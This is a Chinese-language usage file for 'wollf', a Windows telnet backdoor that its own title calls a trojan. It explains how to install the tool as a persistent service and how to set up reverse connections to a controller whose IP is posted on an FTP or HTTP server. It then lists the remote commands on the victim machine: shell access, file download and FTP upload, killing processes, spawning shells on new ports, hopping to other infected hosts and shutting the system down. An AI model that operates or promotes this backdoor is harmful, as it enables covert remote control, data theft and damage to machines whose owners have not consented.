?? telnet木馬wollf的使用命令.txt
字號:
Wollf remote manager v1.3, for Windows NT/2000, build 2002-01-19
Code by wollf, http://www.xfocus.org
擴展Telnet服務,可傳輸文件,可反向連接,可通過參數選擇隨系統啟動或作為普通進程啟動。
運行參數:
wollf [options]
[options]含義如下:
-install:安裝wollf服務,默認參數;
-remove:停止并清除wollf服務;
-debug:調試wollf服務,用于安裝失敗后查看出錯信息;
-once:作為普通進程運行,重啟后不自動加載;
-listen [port]:監聽指定端口,等待遠程連接,主要用于反向連接方式;
-setup:對wollf.exe進行設置,包括監聽端口、訪問口令或設置為反向連接方式,完成后將生成wollf_new.exe,設置內容及示例見"config_howto.txt"。
運行示例:
"wollf" 安裝并啟動服務,監聽默認端口7614;
"wollf -remove" 停止并卸載服務;
"wollf -debug" 無法安裝服務,加-debug參數運行,以便查看失敗原因;
"wollf -once" 作為普通進程運行,重新啟動后不自動加載,指定監聽2000端口;
"wollf -listen 2000" 監聽2000端口,等待遠程機器主動連接;
"wollf -setup" 對wollf.exe進行配置,并生成wollf_new.exe。
默認監聽端口為7614,通過Telnet連接后可輸入"help"查看命令列表。可通過"exit"命令斷開連接,"quit"命令關閉服務,"remove"命令關閉并卸載服務。
若將wollf服務設置為反向連接方式,需要事先向FTP或HTTP服務器上傳一個包含控制者IP地址和監聽端口的文本文件,格式為"[IP]:[port]",如"192.168.1.1:2000",然后運行"wollf -listen 2000"等待連接。
建議使用nc(NetCat)作為客戶端進行連接。命令參數中如有空格必須置于引號對中,如CD "My Documents"。
目前支持以下命令:
DOS 切換到MS-DOS提示符
DIR/LS/LIST 目錄/文件列表
CD 進入目錄
MD/MKDIR 創建目錄
PWD 查看當前目錄
COPY/CP 復制目錄/文件
DEL/RM 刪除目錄/文件
REN 重命名文件
MOVE/MV 移動目錄/文件
TYPE/CAT 查看文本內容
WGET 從HTTP服務器下載文件
FGET 從FTP服務器下載文件
FPUT 向FTP服務器上傳文件
SHELL 通過系統SHELL(cmd.exe)執行命令,如"SHELL DIR"
EXEC/RUN 通過Windows API(WinExec)運行程序
PS 查看進程列表
WS 查看窗口列表
KILL 強行關閉進程
WHO/W 查看當前所有連接者IP
EXPORT 在新端口輸出SHELL
TELNET 連接到其他安裝本服務的機器
POPMSG 彈出系統對話框
SYSINFO 查看系統基本信息
SHUTDOWN 關閉系統
EXIT 斷開當前連接
QUIT 斷開所有連接并終止服務
REMOVE 卸載服務
VER/VERSION 版本信息
HELP/H/? 幫助信息
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -